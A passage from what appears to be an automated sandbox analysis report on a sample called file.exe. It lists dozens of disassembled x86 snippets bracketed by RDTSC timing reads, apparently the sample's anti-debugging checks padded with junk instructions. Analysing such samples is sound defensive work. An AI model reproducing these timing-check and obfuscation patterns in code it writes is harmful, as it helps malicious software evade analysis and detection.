                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E407 second address: 61E419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F7704DD53A8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F2CB second address: 61F2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F7704E143B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F2DC second address: 61F2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F2E2 second address: 61F2EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7704E143B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620DDD second address: 620DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62184F second address: 62186A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143C7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62186A second address: 62188B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7704DD53B5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62188B second address: 6218F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F7704E143B8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 clc 0x00000023 push 00000000h 0x00000025 mov edi, dword ptr [ebp+122D393Dh] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F7704E143B8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 jmp 00007F7704E143BDh 0x0000004c xor dword ptr [ebp+1245D2E5h], edi 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6218F8 second address: 621903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7704DD53A6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6222C7 second address: 62233E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 adc edi, 13A1D2B8h 0x0000000f adc edi, 69A1EB46h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F7704E143B8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 sub dword ptr [ebp+122D1CEFh], edi 0x00000037 jnp 00007F7704E143BCh 0x0000003d mov edi, dword ptr [ebp+122D3601h] 0x00000043 xchg eax, ebx 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F7704E143C0h 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d popad 0x0000004e pop edx 0x0000004f push eax 0x00000050 je 00007F7704E143CEh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F7704E143BCh 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62233E second address: 622342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62380B second address: 623836 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7704E143B8h 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7704E143C8h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623836 second address: 62387B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D1C2Fh] 0x0000000e push 00000000h 0x00000010 movzx esi, cx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F7704DD53A8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xor edi, 05C37003h 0x00000035 clc 0x00000036 push eax 0x00000037 pushad 0x00000038 je 00007F7704DD53ACh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626F1C second address: 626F34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F7704E143B6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626F34 second address: 626F3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62846A second address: 628478 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 jc 00007F7704E143CAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE17F second address: 5DE183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AA37 second address: 62AA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628B46 second address: 628BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F7704DD53A8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D29A5h], edi 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov di, ax 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov bl, dl 0x0000003b mov eax, dword ptr [ebp+122D00A1h] 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007F7704DD53A8h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b push eax 0x0000005c mov dword ptr [ebp+12449208h], edi 0x00000062 pop ebx 0x00000063 mov ebx, 5B74528Fh 0x00000068 push esi 0x00000069 mov ebx, edi 0x0000006b pop edi 0x0000006c push FFFFFFFFh 0x0000006e mov di, 568Fh 0x00000072 nop 0x00000073 pushad 0x00000074 pushad 0x00000075 js 00007F7704DD53A6h 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AA3C second address: 62AA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7704E143B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AA46 second address: 62AA62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AA62 second address: 62AABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7704E143B8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1A27h], ecx 0x00000028 mov edi, dword ptr [ebp+1246AD9Bh] 0x0000002e push 00000000h 0x00000030 jmp 00007F7704E143C4h 0x00000035 push 00000000h 0x00000037 or bx, 2FB5h 0x0000003c push eax 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AABB second address: 62AABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C83B second address: 62C856 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7704E143BCh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C856 second address: 62C879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7704DD53AAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C9A3 second address: 62C9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FC98 second address: 62FD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F7704DD53B3h 0x0000000b je 00007F7704DD53A6h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F7704DD53A8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push esi 0x00000031 mov edi, esi 0x00000033 pop edi 0x00000034 mov bl, 6Ch 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F7704DD53A8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 jns 00007F7704DD53ABh 0x00000058 push 00000000h 0x0000005a jne 00007F7704DD53A6h 0x00000060 xchg eax, esi 0x00000061 jnp 00007F7704DD53B4h 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push edx 0x0000006c pop edx 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EF65 second address: 62EF6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FD32 second address: 62FD41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F7704DD53A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FFA5 second address: 62FFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FFA9 second address: 62FFAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FFAF second address: 62FFB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E13 second address: 632E17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E17 second address: 632E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E1D second address: 632E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633EAB second address: 633EBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7704E143B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633EBF second address: 633F49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F7704DD53A8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 js 00007F7704DD53BAh 0x0000002b jmp 00007F7704DD53B4h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F7704DD53A8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov ebx, dword ptr [ebp+12468410h] 0x00000052 push 00000000h 0x00000054 sbb bl, FFFFFFE2h 0x00000057 mov edi, dword ptr [ebp+122D2B95h] 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jns 00007F7704DD53A8h 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635F16 second address: 635F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635F1B second address: 635F81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D3205h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F7704DD53A8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov ebx, eax 0x00000031 mov dword ptr [ebp+122D34B1h], eax 0x00000037 push 00000000h 0x00000039 mov ebx, dword ptr [ebp+122D3695h] 0x0000003f mov dword ptr [ebp+12449535h], ebx 0x00000045 xchg eax, esi 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F7704DD53B5h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632F2E second address: 632F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143C5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632F48 second address: 632F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6340FA second address: 6340FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637056 second address: 637066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631F89 second address: 631F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637066 second address: 63706A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631F8F second address: 631FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jne 00007F7704E143B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631FA3 second address: 631FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637329 second address: 637348 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7704E143BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F7704E143C8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F7704E143B6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63907E second address: 639082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6383B3 second address: 6383D5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7704E143C6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639082 second address: 6390E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a jmp 00007F7704DD53AAh 0x0000000f pop ecx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 popad 0x00000015 nop 0x00000016 pushad 0x00000017 pushad 0x00000018 sub dword ptr [ebp+12470146h], edi 0x0000001e push edi 0x0000001f pop ebx 0x00000020 popad 0x00000021 mov al, 77h 0x00000023 popad 0x00000024 jmp 00007F7704DD53AAh 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+12475076h], esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F7704DD53A8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov di, si 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63926A second address: 639274 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D81F second address: 63D844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7704DD53A6h 0x0000000a popad 0x0000000b jmp 00007F7704DD53ACh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jns 00007F7704DD53A8h 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642790 second address: 6427DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F7704E143BEh 0x0000000c pop edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F7704E143C3h 0x00000017 jmp 00007F7704E143C4h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jng 00007F7704E143B6h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFC70 second address: 5DFC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFC74 second address: 5DFC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFC78 second address: 5DFCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7704DD53B0h 0x0000000e jmp 00007F7704DD53B9h 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641FE3 second address: 641FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC737 second address: 5DC73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650917 second address: 650945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7704E143B6h 0x0000000a popad 0x0000000b jns 00007F7704E143CEh 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F60B second address: 64F617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7704DD53A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F617 second address: 64F634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F7704E143C2h 0x0000000b jg 00007F7704E143B6h 0x00000011 jnc 00007F7704E143B6h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F634 second address: 64F646 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F7704DD53A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F646 second address: 64F64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FE6D second address: 64FECA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7704DD53B2h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F7704DD53B1h 0x00000010 jno 00007F7704DD53A6h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007F7704DD53B8h 0x00000021 pushad 0x00000022 jmp 00007F7704DD53AEh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E8F6 second address: 69E900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E900 second address: 69E904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA34 second address: 69EA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA38 second address: 69EA46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA46 second address: 69EA5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA5F second address: 69EA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1334 second address: 6A133A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
